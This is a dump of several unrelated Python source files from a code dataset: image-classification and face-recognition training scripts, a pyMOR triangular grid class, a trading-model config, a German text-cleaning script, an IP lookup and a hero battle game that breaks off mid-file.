loaded_model.layers[:nb_freeze]:\n layer.trainable = False\n for layer in loaded_model.layers[nb_freeze:]:\n layer.trainable = True\n\n # we need to recompile the model for these modifications to take effect\n # we use SGD with a low learning rate\n loaded_model.compile(optimizer=Adam(lr=optimizer_lr), loss=\"binary_crossentropy\", metrics=[fbs])\n\n # this is the augmentation configuration we will use for training\n train_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input,\n horizontal_flip=True,\n vertical_flip=True,\n zoom_range=0.15,\n width_shift_range=0.15,\n height_shift_range=0.15,\n rotation_range=180,\n fill_mode='reflect',\n p_rotation=0.2,\n rotation_angles=[-90, 0, 90, 180],\n p_zoom=0.4,\n p_shift=0.4)\n\n # this is the augmentation configuration we will use for testing:\n test_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input,\n horizontal_flip=True,\n vertical_flip=True,\n zoom_range=0.15,\n width_shift_range=0.15,\n height_shift_range=0.15,\n rotation_range=180,\n fill_mode='reflect',\n p_rotation=0.,\n rotation_angles=[-90, 0, 90, 180],\n p_zoom=0.,\n p_shift=0.)\n\n # define train & val data generators\n train_generator = train_datagen.flow(\n X_train,\n y_train,\n batch_size=batch_size,\n shuffle=True)\n\n validation_generator = test_datagen.flow(\n X_val,\n y_val,\n batch_size=batch_size,\n shuffle=True)\n\n # get class weights\n if class_imbalance:\n class_weight = get_class_weights(np.sum(y_train, axis=0), smooth_factor=0.1)\n else:\n class_weight = None\n\n # train the model on the new data for a few epochs on the batches generated by datagen.flow().\n loaded_model.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples // batch_size,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples // batch_size,\n callbacks=[EarlyStopping(monitor='val_loss', patience=patience),\n ModelCheckpoint(filepath=inception_h5_check_point, save_best_only=True),\n ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=patience_lr)],\n class_weight=class_weight)\n\n # save weights\n loaded_model.save_weights(inception_h5_save_to)\n\n\n\n\n\ndef preprocess_input(x):\n \"\"\"\n Preprocessing step for inception v3.\n \"\"\"\n x /= 255.\n x -= 0.5\n x *= 2.\n return x\n\n\n\n\ndef get_class_weights(y, smooth_factor=0):\n \"\"\"\n Returns the weights for each class based on the frequencies of the samples\n :param smooth_factor: factor that smooths extremely uneven weights\n :param y: list of true labels (the labels must be hashable)\n :return: dictionary with the weight for each class\n \"\"\"\n\n if smooth_factor > 0:\n p = y.max() * smooth_factor\n y = y + p\n\n majority = float(y.max())\n\n return {clss: (majority / cnt) for clss, cnt in enumerate(y)}\n\n\n\ndef f2_score(y_true, y_pred):\n # fbs throws a confusing error if inputs are not numpy arrays\n y_true, y_pred = np.array(y_true), np.array(y_pred)\n # We need to use average='samples' here, any other average method will generate bogus results\n return fbs(y_true, y_pred, beta=2, average='samples')\n\n\n\ndef fbs(y_true, y_pred, threshold_shift=0.3, beta=2):\n\n # just in case of hipster activation at the final layer\n y_pred = K.clip(y_pred, 0, 1)\n\n # shifting the prediction threshold from .5 if needed\n y_pred_bin = K.round(y_pred + threshold_shift)\n\n tp = K.sum(K.round(y_true * y_pred_bin)) + K.epsilon()\n fp = K.sum(K.round(K.clip(y_pred_bin - y_true, 0, 1)))\n fn = K.sum(K.round(K.clip(y_true - y_pred_bin, 0, 1)))\n\n precision = tp / (tp + fp)\n recall = tp / (tp + fn)\n\n beta_squared = beta ** 2\n return (beta_squared + 1) * (precision * recall) / (beta_squared * precision + recall + K.epsilon())\n\n\n\ndef binary_crossentropy_weighted(y_true, y_pred, one_weight=4.):\n y_weight = K.clip(y_true * one_weight, 1., one_weight)\n out = K.binary_crossentropy(y_pred, y_true) * y_weight\n return K.mean(out, axis=-1)\n\n\n\n\ndef train_for_a_fold(df_train, df_val, fold_id, target_size=(139,139),\n model_dir=\"../data/planet_amazon/models/\",\n image_dir=\"../data/planet_amazon/train-jpg/\",\n verbose=1):\n \"\"\"\n Train an Inception V3 for a fold.\n \"\"\"\n\n if verbose >= 1: print(\"Training for fold %d...\"%fold_id)\n\n ### Prepare weights\n labels = ['agriculture', 'artisinal_mine', 'bare_ground', 'blooming',\\\n 'blow_down', 'clear', 'cloudy', 'conventional_mine', 'cultivation',\\\n 'habitation', 'haze', 'partly_cloudy', 'primary', 'road',\\\n 'selective_logging', 'slash_burn', 'water']\n n_labels = np.array([12315, 339, 862, 332, 98, 28431,\n 9350, 100, 4477, 3660, 2697, 7261,\n 37513, 8071, 340, 209, 7411])\n label_weights = np.array([cw for cid, cw in sorted(get_class_weights(n_labels).items())])\n label_counts = np.ceil( 10. * label_weights / label_weights.max() ).astype(int)\n\n ### Load images\n if verbose >= 1: print(\"\\tLoading images into RAM (fold %d)...\"%fold_id)\n X_train, y_train = [], []\n X_val, y_val = [], []\n # for train and validation\n for df, X, y, n_max_img in [(df_train, X_train, y_train, 1), (df_val, X_val, y_val, 1)]:\n for image_id, y_lab in tqdm(list(zip(df.image_name, df.iloc[:,2:].values)), miniters=100):\n image_path = image_dir+str(image_id)+\".jpg\"\n if os.path.exists(image_path):\n try:\n img = load_img(image_path, target_size=target_size)\n arr = img_to_array(img)\n for _ in range(min((int(np.max(label_counts * y_lab)), n_max_img))):\n X.append(arr)\n y.append(y_lab)\n except OSError:\n if verbose >= 2: print(\"OSError on image %s.\"%image_path)\n else:\n raise(ValueError(\"Image %s does not exist.\"%image_path))\n X_train = np.array(X_train)\n X_val = np.array(X_val)\n y_train = np.array(y_train)\n y_val = np.array(y_val)\n if verbose >= 2:\n print(X_train.shape)\n print(y_train.shape)\n print(X_val.shape)\n print(y_val.shape)\n print(np.mean(y_train, axis=0))\n print(np.mean(y_val, axis=0))\n\n ### Create model\n if verbose >= 1: print(\"\\tInstantiating Inception V3 (fold %d)...\"%fold_id)\n n_classes = y_train.shape[1]\n base_model, model = instantiate(n_classes, n_dense=2048, inception_json=model_dir+\"inceptionv3_128_mod_%d.json\"%fold_id, verbose=verbose)\n\n ### Train model\n if verbose >= 1: print(\"\\tFine-tuning Inception V3 first pass (fold %d)...\"%fold_id)\n finetune(base_model, model, X_train, y_train, X_val, y_val, batch_size=64, epochs_1=5,\n nb_train_samples=len(y_train), nb_validation_samples=len(y_val),\n patience_1=2, patience_lr=1, class_imbalance=False,\n inception_h5_1=model_dir+\"inceptionv3_128_fine_tuned_1_%d.h5\"%fold_id,\n inception_h5_check_point_1=model_dir+\"inceptionv3_128_fine_tuned_check_point_1_%d.h5\"%fold_id,\n layer_names_file=model_dir+\"inceptionv3_128_mod_layer_names.txt\",\n verbose=verbose)\n del(base_model)\n del(model)\n K.clear_session()\n if verbose >= 1: print(\"\\tFine-tuning Inception V3 second pass (fold %d)...\"%fold_id)\n finetune_from_saved(model_dir+\"inceptionv3_128_fine_tuned_check_point_1_%d.h5\"%fold_id,\n model_dir+\"inceptionv3_128_fine_tuned_2_%d.h5\"%fold_id,\n model_dir+\"inceptionv3_128_mod_%d.json\"%fold_id,\n X_train, y_train, X_val, y_val, batch_size=64, nb_freeze=172,\n patience=5, patience_lr=1, class_imbalance=False, epochs=10, optimizer_lr=0.0004,\n nb_train_samples=len(y_train), nb_validation_samples=len(y_val),\n inception_h5_check_point=model_dir+\"inceptionv3_128_fine_tuned_check_point_2_%d.h5\"%fold_id,\n verbose=verbose)\n K.clear_session()\n if verbose >= 1: print(\"\\tFine-tuning Inception V3 third pass (fold %d)...\"%fold_id)\n finetune_from_saved(model_dir+\"inceptionv3_128_fine_tuned_check_point_2_%d.h5\"%fold_id,\n model_dir+\"inceptionv3_128_fine_tuned_3_%d.h5\"%fold_id,\n model_dir+\"inceptionv3_128_mod_%d.json\"%fold_id,\n X_train, y_train, X_val, y_val, batch_size=64, nb_freeze=0,\n patience=10, patience_lr=3, class_imbalance=False, optimizer_lr=0.00004,\n nb_train_samples=len(y_train), nb_validation_samples=len(y_val),\n inception_h5_check_point=model_dir+\"inceptionv3_128_fine_tuned_check_point_3_%d.h5\"%fold_id,\n verbose=verbose)\n K.clear_session()\n\n\n\n\n#==============================================\n# Main\n#==============================================\nif __name__ == '__main__':\n fold_id = int(sys.argv[2])\n df_train = pd.read_csv(\"../data/planet_amazon/train%d.csv\"%fold_id)\n df_val = pd.read_csv(\"../data/planet_amazon/val%d.csv\"%fold_id)\n train_for_a_fold(df_train, df_val, fold_id, verbose=2)\n","sub_path":"train_model_inceptionv3_128.py","file_name":"train_model_inceptionv3_128.py","file_ext":"py","file_size_in_byte":16041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"157686718","text":"from direct.showbase.ShowBase import ShowBase\nfrom controller import Controller\n\nclass Game(ShowBase):\n def __init__(self):\n ShowBase.__init__(self)\n self.model = loader.loadModel('models/environment')\n self.model.reparentTo(render)\n self.model.setScale(0.1)\n self.model.setPos(-2, 20, -3)\n # устанавливаем поле зрения объектива\n base.camLens.setFov(70)\n\n skybox = loader.loadModel('skybox.egg')\n skybox.setScale(1024)\n skybox.reparentTo(render)\n\n # создаём контроллер мышки и клавиатуры\n self.controller = Controller()\n\n self.controller.setMovingStep(1)\n\ngame = Game()\ngame.run()\n","sub_path":"example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"345932676","text":"'''\nauthor:Skymos Wu\nversion:0.5\n'''\n# 加载keras库\nimport keras\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Activation,Convolution2D,Dropout,MaxPooling2D,Flatten\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import TensorBoard\n# 加载数据处理用库\nfrom utils.load_data import load_data\nimport numpy as np\nimport os\nfrom playsound import playsound\n\ndef construct_model(people,nb_filters1=32,nb_filters2=64,nb_pool=2,nb_conv=3):\n '''\n 模型创建用函数,模型的构建参考Alexnet的结构,模型的构成如下:\n \n '''\n model = Sequential()\n model.add(Convolution2D(nb_filters1, (nb_conv, nb_conv),border_mode='valid',input_shape=(56,56,3),data_format='channels_last'))\n model.add(Activation('tanh'))\n model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))\n\n model.add(Convolution2D(nb_filters2, (nb_conv, nb_conv)))\n model.add(Activation('tanh'))\n model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))\n model.add(Dropout(0.25))\n\n model.add(Flatten())\n model.add(Dense(1000)) #Full connection\n model.add(Activation('tanh'))\n model.add(Dropout(0.5))\n model.add(Dense(people))\n model.add(Activation('softmax'))\n model.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])\n print('Model construction complete.')\n playsound('alert/nncomplete.mp3')\n return model\n\ndef load():\n '''\n 加载数据和标准化数据用工具函数\n '''\n (x_train,y_train,classes) = load_data('face-data')\n x_train = x_train / 255\n y_use = list(np.arange(0,classes))\n tempst = sorted(list(set(y_train)))\n dct = dict(zip(tempst,y_use))\n y_fit = []\n for i in y_train:\n y_fit.append(dct[i])\n y_fit = np.array(y_fit)\n y_fit = np_utils.to_categorical(y_fit,num_classes=classes)\n return x_train,y_fit,classes,dct\n\nif __name__ == '__main__':\n x_train,y_train,classes,dct = load()\n # 使用ImageDataGenerator生成噪声数据,提高模型的泛用性\n tb = TensorBoard(log_dir='./logs',write_graph=True,write_images=True)\n model = construct_model(classes)\n model.fit(x_train,y_train,epochs=200,callbacks=[tb])\n playsound('alert/tc.mp3')\n # 保存模型\n model.save('face-model.h5')\n \n","sub_path":"model_train.py","file_name":"model_train.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"589268647","text":"# This file is part of the pyMOR project (http://www.pymor.org).\n# Copyright Holders: Rene Milk, Stephan Rave, Felix Schindler\n# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)\n\nfrom __future__ import absolute_import, division, print_function\n\nimport numpy as np\n\nfrom pymor.grids.interfaces import AffineGridInterface\nfrom pymor.grids.referenceelements import triangle\n\n\nclass TriaGrid(AffineGridInterface):\n '''Basic implementation of a triangular grid on a rectangular domain.\n\n The global face, edge and vertex indices are given as follows ::\n\n 6---10----7---11----8\n | \\ 6 | \\ 7 |\n 3 14 4 15 5\n | 2 \\ | 3 \\ |\n 3----8----4----9----5\n | \\ 4 | \\ 5 |\n 0 12 1 13 2\n | 0 \\ | 1 \\ |\n 0----6----1----7----2\n\n Parameters\n ----------\n num_intervals\n Tuple `(n0, n1)` determining a grid with `n0` x `n1` codim-0 entities.\n domain\n Tuple `(ll, ur)` where `ll` defines the lower left and `ur` the upper right\n corner of the domain.\n '''\n\n dim = 2\n dim_outer = 2\n reference_element = triangle\n\n def __init__(self, num_intervals=(2, 2), domain=[[0, 0], [1, 1]]):\n self.num_intervals = num_intervals\n self.domain = np.array(domain)\n\n self.x0_num_intervals = num_intervals[0]\n self.x1_num_intervals = num_intervals[1]\n self.x0_range = self.domain[:, 0]\n self.x1_range = self.domain[:, 1]\n self.x0_width = self.x0_range[1] - self.x0_range[0]\n self.x1_width = self.x1_range[1] - self.x1_range[0]\n self.x0_diameter = self.x0_width / self.x0_num_intervals\n self.x1_diameter = self.x1_width / self.x1_num_intervals\n n_elements = self.x0_num_intervals * self.x1_num_intervals * 2\n\n # TOPOLOGY\n self.__sizes = (n_elements,\n ((self.x0_num_intervals + 1) * self.x1_num_intervals +\n (self.x1_num_intervals + 1) * self.x0_num_intervals +\n int(n_elements / 2)),\n (self.x0_num_intervals + 1) * (self.x1_num_intervals + 1))\n\n # calculate subentities -- codim-0\n edge_hoffset = (self.x0_num_intervals + 1) * self.x1_num_intervals\n edge_doffset = edge_hoffset + self.x0_num_intervals * (self.x1_num_intervals + 1)\n E0V = ((np.arange(self.x1_num_intervals, dtype=np.int32) * (self.x0_num_intervals + 1))[:, np.newaxis] +\n np.arange(self.x0_num_intervals, dtype=np.int32)).ravel()\n E0H = np.arange(n_elements / 2, dtype=np.int32) + edge_hoffset\n E0D = np.arange(n_elements / 2, dtype=np.int32) + edge_doffset\n\n E1V = E0V + 1\n E1H = E0H + self.x0_num_intervals\n E1D = E0D\n\n codim0_subentities = np.vstack((np.vstack((E0D, E0V, E0H)).T, np.vstack((E1D, E1V, E1H)).T))\n\n # calculate subentities -- codim-1\n\n V0 = E0V[:, np.newaxis] + np.array([0, 1, self.x0_num_intervals + 1], dtype=np.int32)\n V1 = E0V[:, np.newaxis] + np.array([self.x0_num_intervals + 2, self.x0_num_intervals + 1, 1], np.int32)\n codim1_subentities = np.vstack((V0, V1))\n self.__subentities = (codim0_subentities, codim1_subentities)\n\n # GEOMETRY\n\n # embeddings\n x0_shifts0 = np.arange(self.x0_num_intervals) * self.x0_diameter + self.x0_range[0]\n x1_shifts0 = np.arange(self.x1_num_intervals) * self.x1_diameter + self.x1_range[0]\n x0_shifts1 = x0_shifts0 + self.x0_diameter\n x1_shifts1 = x1_shifts0 + self.x1_diameter\n B = np.vstack((np.array(np.meshgrid(x0_shifts0, x1_shifts0)).reshape((2, -1)).T,\n np.array(np.meshgrid(x0_shifts1, x1_shifts1)).reshape((2, -1)).T))\n A0 = np.tile(np.diag([self.x0_diameter, self.x1_diameter]), (n_elements / 2, 1, 1))\n A1 = - A0\n A = np.vstack((A0, A1))\n self.__embeddings = (A, B)\n\n def __str__(self):\n return (('Tria-Grid on domain [{xmin},{xmax}] x [{ymin},{ymax}]\\n' +\n 'x0-intervals: {x0ni}, x1-intervals: {x1ni}\\n' +\n 'faces: {faces}, edges: {edges}, vertices: {vertices}')\n .format(xmin=self.x0_range[0], xmax=self.x0_range[1],\n ymin=self.x1_range[0], ymax=self.x1_range[1],\n x0ni=self.x0_num_intervals, x1ni=self.x1_num_intervals,\n faces=self.size(0), edges=self.size(1), vertices=self.size(2)))\n\n def size(self, codim=0):\n assert 0 <= codim <= 2, 'Invalid codimension'\n return self.__sizes[codim]\n\n def subentities(self, codim, subentity_codim):\n assert 0 <= codim <= 2, 'Invalid codimension'\n assert codim <= subentity_codim <= 2, 'Invalid subentity codimension'\n if codim == 0:\n if subentity_codim == 0:\n return np.arange(self.size(0), dtype='int32')[:, np.newaxis]\n else:\n return self.__subentities[subentity_codim - 1]\n else:\n return super(TriaGrid, self).subentities(codim, subentity_codim)\n\n def embeddings(self, codim=0):\n if codim == 0:\n return self.__embeddings\n else:\n return super(TriaGrid, self).embeddings(codim)\n","sub_path":"src/pymor/grids/tria.py","file_name":"tria.py","file_ext":"py","file_size_in_byte":5365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"44497395","text":"#! /usr/bin/env python2.7\r\n# -*- coding: utf-8 -*-\r\n# @author Bin Hong\r\n\r\n\"\"\"\r\n\"\"\"\r\n\r\nimport sys\r\nimport os\r\nimport platform\r\nimport socket\r\n\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\n\r\nlocal_path = os.path.dirname(__file__)\r\nroot = os.path.join(local_path, '..')\r\nsys.path.append(root)\r\n\r\nfrom main.base.score2 import ScoreLabel\r\n\r\nfrom main.work import model\r\nfrom main.work import build\r\nfrom main.work import pred\r\nfrom main.work.conf import MltradeConf\r\nfrom main.ta import ta_set\r\nfrom main.model.spliter import StaticSpliter\r\nfrom main.classifier.tree import MyRandomForestClassifier\r\nfrom main.classifier.tree import RFCv1n2000md6msl100\r\nfrom main.classifier.tree import MyGradientBoostingClassifier\r\nfrom main.classifier.tree import MyLogisticRegressClassifier\r\n\r\n\r\nif platform.platform().startswith(\"Windows\"):\r\n TEST = True\r\nelif platform.platform().startswith(\"Darwin\"):\r\n TEST = True\r\nelif '47.90.41.27' == socket.gethostbyname(socket.gethostname()):\r\n TEST = True\r\nelse:\r\n TEST = False\r\n\r\ndef getConf2():\r\n \"\"\"\r\n for test\r\n :return:\r\n \"\"\"\r\n classifier = MyRandomForestClassifier()\r\n confer = MltradeConf(500,classifier=classifier, score1=ScoreLabel(5, 1.0),\r\n score2 = ScoreLabel(5, 1.0),\r\n model_split=StaticSpliter(2010,2013,1, 1900, 2010),\r\n valid_split=StaticSpliter(2013, 2017, 1, 1900, 2010),\r\n ta = ta_set.TaSetBase1Ext8(), n_pool=25)\r\n\r\n return confer\r\n\r\ndef getConf():\r\n if not TEST:\r\n #classifier = MyRandomForestClassifier(n_estimators = 1000)\r\n classifier = MyGradientBoostingClassifier(n_estimators = 100)\r\n classifier = RFCv1n2000md6msl100()\r\n classifier = MyLogisticRegressClassifier()\r\n ta = ta_set.TaSetBase1Ext4El()\r\n confer = MltradeConf(150,classifier=classifier, score1=ScoreLabel(5, 1.0),\r\n score2 = ScoreLabel(5, 1.0),\r\n model_split=StaticSpliter(2010,2017,1, 1700, 2010),\r\n valid_split=StaticSpliter(2013, 2017, 1, 1700, 2010),\r\n ta = ta, n_pool=30, index=\"sp100\")\r\n confer.syms = confer.syms[0:1]\r\n\r\n else:\r\n ta = ta_set.TaSetBase1()\r\n clazz = MyRandomForestClassifier(n_estimators=10, min_samples_leaf=10)\r\n clazz = MyLogisticRegressClassifier()\r\n confer = MltradeConf(2,\r\n classifier= clazz,\r\n score1=ScoreLabel(5, 1.0),\r\n score2 = ScoreLabel(5, 1.0),\r\n model_split=StaticSpliter(2010,2013, 1, 2000, 2010),\r\n valid_split=StaticSpliter(2013, 2017, 1, 2003, 2013),\r\n ta = ta, n_pool=1)\r\n confer.syms = confer.syms[0:1]\r\n return confer\r\n\r\nif __name__ == '__main__':\r\n confer = getConf()\r\n build.work(confer)\r\n model.work(confer)\r\n pred.work(confer)\r\n","sub_path":"run/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"238005559","text":"import codecs, nltk, string\r\nfrom nltk.corpus import stopwords\r\nimport csv\r\n\r\nfrom nltk.stem import SnowballStemmer\r\nsnowball_stemmer = SnowballStemmer(\"german\")\r\n\r\ndataset = codecs.open(\"presse/cdu/cdu.tsv\", \"r\", \"utf-8\").read().strip().split(\"\\n\")\r\n\r\nfrom nltk.stem.wordnet import WordNetLemmatizer\r\n\r\nwordnet_lemmatizer = WordNetLemmatizer()\r\n\r\nexclude = set(string.punctuation)\r\nstop_word_list = stopwords.words('german')\r\n\r\n# input should be a string\r\ndef nlp_pipeline(text):\r\n # if you want you can split in sentences - i'm usually skipping this step\r\n # text = nltk.sent_tokenize(text)\r\n\r\n # tokenize words for each sentence\r\n text = nltk.word_tokenize(text)\r\n\r\n # pos tagger\r\n text = nltk.pos_tag(text)\r\n\r\n # lemmatizer\r\n text = [\r\n wordnet_lemmatizer.lemmatize(token.lower(), \"v\") if \"V\" in pos else wordnet_lemmatizer.lemmatize(token.lower())\r\n for token, pos in text]\r\n\r\n # remove punctuation and numbers\r\n text = [token for token in text if token not in exclude and token.isalpha()]\r\n\r\n # remove stopwords - be careful with this step\r\n text = \" \".join([token for token in text if token not in stop_word_list])\r\n\r\n return text\r\n\r\n\r\ncorpus = []\r\n\r\noutput = codecs.open(\"presse/cdu/cdu_final.tsv\",\"w\",\"utf-8\")\r\n\r\n# be careful with this, the dataset is huge!\r\nfor line in dataset:\r\n #print line\r\n article = line.split(\"\\t\")[2]\r\n\r\n text = nlp_pipeline(article)\r\n\r\n text = text.replace(\"\\t\", \" \")\r\n #print text\r\n\r\n output.write(line + \"\\t\" + text + \"\\n\")\r\n\r\noutput.close()","sub_path":"resources/cdu/cleaning_cdu.py","file_name":"cleaning_cdu.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"616390983","text":"import requests\nfrom lxml import etree\nimport os\n\ndef get_ip():\n payload = {'key1': 'value1', 'key2': 'value2'}\n\n r = requests.get(url='https://www.ipip.net',data=payload)\n html=etree.HTML(r.text)\n ip=html.xpath('//*[@id=\"ip\"]/text()')\n print(ip)\n\nget_ip()","sub_path":"wol/whatsmyip.py","file_name":"whatsmyip.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"486608911","text":"import random\n\nclass Hero:\n def __init__(self, name, health = 100):\n # Initialize starting values\n self.abilities = list()\n self.name = name\n self.armors = list()\n self.start_health = health\n self.health = health\n self.deaths = 0\n self.kills = 0\n\n def defend(self):\n \"\"\"\n This method should run the defend method on each piece of armor and calculate the total defense.\n If the hero's health is 0, the hero is out of play and should return 0 defense points.\n \"\"\"\n total_defense = 0\n for armor in self.armors:\n total_defense += armor.defend()\n if self.health == 0:\n total_defense = 0\n return total_defense\n\n def take_damage(self, damage_amt):\n \"\"\"\n This method should subtract the damage amount from the hero's health.\n\n If the hero dies update number of deaths.\n \"\"\"\n self.health = self.health - damage_amt\n if self.health <= 0:\n self.deaths += 1\n\n def add_kill(self, num_kills):\n self.kills += num_kills\n\n \"\"\"\n This method should add the number of kills to self.kills\n \"\"\"\n\n\n def add_ability(self, ability):\n # Add ability to abilities list\n self.abilities.append(ability)\n\n def add_armor(self, armor):\n self.armors.append(armor)\n\n def attack(self):\n total_attack = 0\n if self.abilities != None:\n for ability in self.abilities:\n print(\"hero attack function: \")\n print(ability)\n total_attack += ability.attack()\n return total_attack\n # total_attack = 0\n # for add_attack in self.abilities:\n # total_attack += add_attack.attack()\n # return total_attack\n\nclass Ability:\n def __init__(self, name, attack_strength): # Initalize starting values\n # Set Ability name\n self.name = name\n # Set attack strength\n self.attack_strength = attack_strength\n\n def attack(self): # Return attack value\n # Calculate lowest attack value as an integer\n lowest_attack_value = self.attack_strength // 2\n # Use random.randit(a, b) to select a random attack value.\n attack_strength = random.randint(lowest_attack_value, self.attack_strength)\n # Return attack value between 0 and the full attack\n return attack_strength\n\n def update_attack(self, attack_strength): # Update attack value\n attack_value = attack_strength\n\nclass Weapon(Ability):\n def attack(self):\n \"\"\"\n This method should return a random value between 0\n and the full attack power of the weapon.\n Hint: The attack power is inherited.\n \"\"\"\n\n return random.randint(0, self.attack_strength)\nclass Armor:\n def __init__(self, name, defense):\n \"\"\"Instantiate name and defense strength. \"\"\"\n self.name = name\n self.defense = defense\n\n def defend(self):\n \"\"\"\n Return a random value between 0 and the\n initialized defend strength.\n \"\"\"\n return random.randint(0, self.defense)\n\nclass Team:\n def __init__(self, team_name):\n \"\"\"Instantiate resources.\"\"\"\n self.name = team_name\n self.heroes = list()\n self.team_kills = 0\n self.team_health = 0\n\n def add_hero(self, Hero):\n \"\"\"Add Hero object to heroes list.\"\"\"\n self.heroes.append(Hero)\n self.team_health += Hero.health\n\n def remove_hero(self, name):\n \"\"\"\n Remove hero from heroes list.\n If Hero isn't found return 0.\n \"\"\"\n\n if self.heroes != None:\n for hero in self.heroes:\n if name in hero.name:\n self.heroes.remove(hero)\n else:\n return 0\n else:\n return 0\n\n def attack(self, other_team):\n \"\"\"\n This method should total our teams attack strength and call the defend() method on the rival team that is passed in.\n It should call add_kill() on each hero with the number of kills made.\n \"\"\"\n total_attack = 0\n for hero in self.heroes:\n total_attack += hero.attack()\n\n other_team_defense = other_team.defend(total_attack)\n for hero in self.heroes:\n hero.add_kill(other_team_defense)\n\n def defend(self, damage_amt):\n \"\"\"\n This method should calculate our team's total defense.\n Any damage in excess of our team's total defense should be evenly distributed amongst all heroes with the deal_damage() method.\n\n Return number of heroes killed in attack.\n \"\"\"\n total_defense = 0\n for hero in self.heroes:\n total_defense += hero.defend()\n excess_damage = damage_amt - total_defense\n\n if excess_damage > 0:\n self.team_health -= excess_damage\n return self.deal_damage(excess_damage)\n else:\n return 0\n\n def deal_damage(self, damage):\n \"\"\"\n Divide the total damage amongst all heroes.\n Return the number of heroes that died in attack.\n \"\"\"\n total_damage = damage // len(self.heroes)\n total_deaths = 0\n for hero in self.heroes:\n hero.take_damage(total_damage)\n if hero.health <=0:\n total_deaths += 1\n return total_deaths\n\n def revive_heroes(self, health = 100):\n self.team_health = 0\n \"\"\"\n This method should reset all heroes health to their original starting value.\n \"\"\"\n for hero in self.heroes:\n hero.health = hero.start_health\n self.team_health += hero.health\n def stats(self):\n \"\"\"\n This method should print the ratio of kills/deaths for each member of the team to the screen.\n\n This data must be output to the terminal.\n \"\"\"\n print(\"cats\")\n for kill in self.heroes:\n print(kill.name + \"Kills: \" + str(kill.kills) + \" Deaths:\" + str(kill.deaths))\n\n def update_kills(self):\n \"\"\"\n This method should update each hero when there is a team kill.\n \"\"\"\n for hero in self.heroes:\n if hero.add_kill:\n print(hero + \" has killed a member of the other team!\")\n\n\n def find_hero(self, name):\n \"\"\"\n Find and return hero from heroes list.\n If Hero isn't found return 0.\n \"\"\"\n\n if self.heroes != None:\n for hero in self.heroes:\n if name == hero.name:\n return hero\n else:\n return 0\n else:\n return 0\n\n def view_all_heroes(self):\n \"\"\"Print out all heroes to the console.\"\"\"\n for hero in self.heroes:\n name = hero.name\n print(name)\n\nclass Arena:\n def __init__(self, team_size=1):\n\n self.team_one = None\n self.team_two = None\n self.team_size = team_size\n\n\n\n def build_team_one(self):\n \"\"\"\n This method should allow a user to build team one.\n \"\"\"\n self.team_one = Team(input(\"Please name the first team: \"))\n print(\"It's time to play! Both teams have \" + str(self.team_size) + \" players\")\n for i in range(self.team_size):\n print(\"Hero number {}. \".format(i))\n self.team_one.add_hero(create_hero())\n\n def build_team_two(self):\n \"\"\"\n This method should allow user to build team two.\n \"\"\"\n self.team_two = Team(input(\"Please name the second team: \"))\n print(\"It's time to play! Both teams have \" + str(self.team_size) + \" players\")\n for i in range(self.team_size):\n print(\"Hero number {}. \".format(i))\n self.team_two.add_hero(create_hero())\n\n def team_battle(self):\n \"\"\"\n This method should continue to battle teams until one or both teams are dead.\n \"\"\"\n print(\"loo loo lemon\")\n print(self.team_one.team_health)\n print(self.team_two.team_health)\n while(self.team_one.team_health>0 and self.team_two.team_health>0):\n self.team_one.attack(self.team_two)\n self.team_two.attack(self.team_one)\n print(\"hi\")\n self.show_stats()\n if(self.team_one.heroes[0].deaths==1):\n return self.team_one.name\n return self.team_two.name\n\n\n def show_stats(self):\n \"\"\"\n This method should print out the battle statistics\n including each heroes kill/death ratio.\n \"\"\"\n self.team_one.stats()\n self.team_two.stats()\n\ndef create_hero():\n hero = Hero(input(\"Please name your hero: \"))\n\n print(\"Please give your hero abilities: \")\n i = None\n while(i != \"done\".lower()):\n hero.add_ability(create_ability())\n i = input(\"Add more abilities? Press enter to keep adding or type 'done' to finish adding heroes. \")\n\n print(\"Please give your hero weapons: \")\n i = None\n while(i != \"done\".lower()):\n hero.add_ability(create_weapon())\n i = input(\"Add more weapons? Press enter to keep adding or type 'done' to finish adding weapons. \")\n\n print(\"Please give your hero armor: \")\n i = None\n while(i != \"done\".lower()):\n hero.add_armor(create_armor())\n i = input(\"Add more armor? Press enter to keep adding or type 'done' to finish adding armor. \")\n print(\"Your hero is ready!! It's time to play!\")\n return hero\n\ndef create_ability():\n ability = Ability(input(\"What is the name of the ability? \"), int(input(\"What is the strength level of the ability? \")))\n return ability\n\ndef create_weapon():\n weapon = Weapon(input(\"What is the name of the weapon? \"), int(input(\"What is the strength level of the weapon? \")))\n return weapon\n\ndef create_armor():\n armor = Armor(input(\"What is the name of the armor? \"), int(input(\"What is the strength level of the armor? \")))\n return armor\n\n\n\nif __name__ == \"__main__\":\n game_is_running = True\n\n # Instantiate Game Arena\n arena = Arena()\n\n #Build Teams\n arena.build_team_one()\n arena.build_team_two()\n\n while game_is_running:\n\n arena.team_battle()\n arena.show_stats()\n play_again = input(\"Play Again? Y or N: \")\n\n #Check for Player Input\n if play_again.lower() == \"n\":\n game_is_running = False\n\n else:\n #Revive heroes to play again\n 